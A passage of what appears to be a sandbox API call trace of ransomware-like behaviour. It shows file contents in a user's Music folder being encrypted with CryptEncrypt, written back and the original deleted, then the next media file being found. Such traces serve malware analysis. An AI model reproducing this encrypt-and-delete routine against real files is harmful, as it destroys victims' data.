dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb060, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0115.148] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4529c30*, pdwDataLen=0x144e2e0*=0x6953, dwBufLen=0x6960 | out: pbData=0x4529c30*, pdwDataLen=0x144e2e0*=0x6960) returned 1 [0115.149] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.149] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x6960, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ece4*=0x6960, lpOverlapped=0x0) returned 1 [0115.151] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0115.151] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0115.151] CryptDestroyKey (hKey=0x41ac440) returned 1 [0115.151] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.196] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0115.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0115.197] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.197] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0115.197] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0115.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.197] FreeLibrary (hLibModule=0x756e0000) returned 1 [0115.197] CloseHandle (hObject=0x298) returned 1 [0115.197] CloseHandle (hObject=0x258) returned 1 [0115.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a", lpFilePart=0x0) returned 0x41 [0115.199] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\0qhbs_ht9zbd62a.m4a")) returned 0x20 [0115.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0115.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f9c40, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xd9ec78c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0xd9ec78c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x6953, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0QhbS_hT9Zbd62A.m4a", cAlternateFileName="0QHBS_~1.M4A")) returned 0x41ac200 [0115.200] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\0qhbs_ht9zbd62a.m4a")) returned 1 [0115.252] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f9c40, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xd9ec78c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0xd9ec78c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x6953, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0QhbS_hT9Zbd62A.m4a", cAlternateFileName="0QHBS_~1.M4A")) returned 0 [0115.252] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0115.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0115.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0115.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0115.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0115.253] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0115.253] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0115.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0115.253] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.253] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0115.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.253] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.253] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100) returned 0x41818b0 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0115.254] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0115.255] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0115.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0115.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0115.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0115.255] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0115.255] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0115.255] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\4YRCHooZsp.mp3", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4a8760, ftCreationTime.dwHighDateTime=0x1d5e604, ftLastAccessTime.dwLowDateTime=0x1d7d5360, ftLastAccessTime.dwHighDateTime=0x1d5ee73, ftLastWriteTime.dwLowDateTime=0x1d7d5360, ftLastWriteTime.dwHighDateTime=0x1d5ee73, nFileSizeHigh=0x0, nFileSizeLow=0xafc6, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="4YRCHooZsp.mp3", cAlternateFileName="4YRCHO~1.MP3")) returned 0x41ac600 [0115.256] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0115.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0115.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0115.256] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0115.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0115.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0115.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0115.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0115.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0115.257] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0115.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0115.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0115.258] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0115.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0115.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0115.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0115.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0115.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0115.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 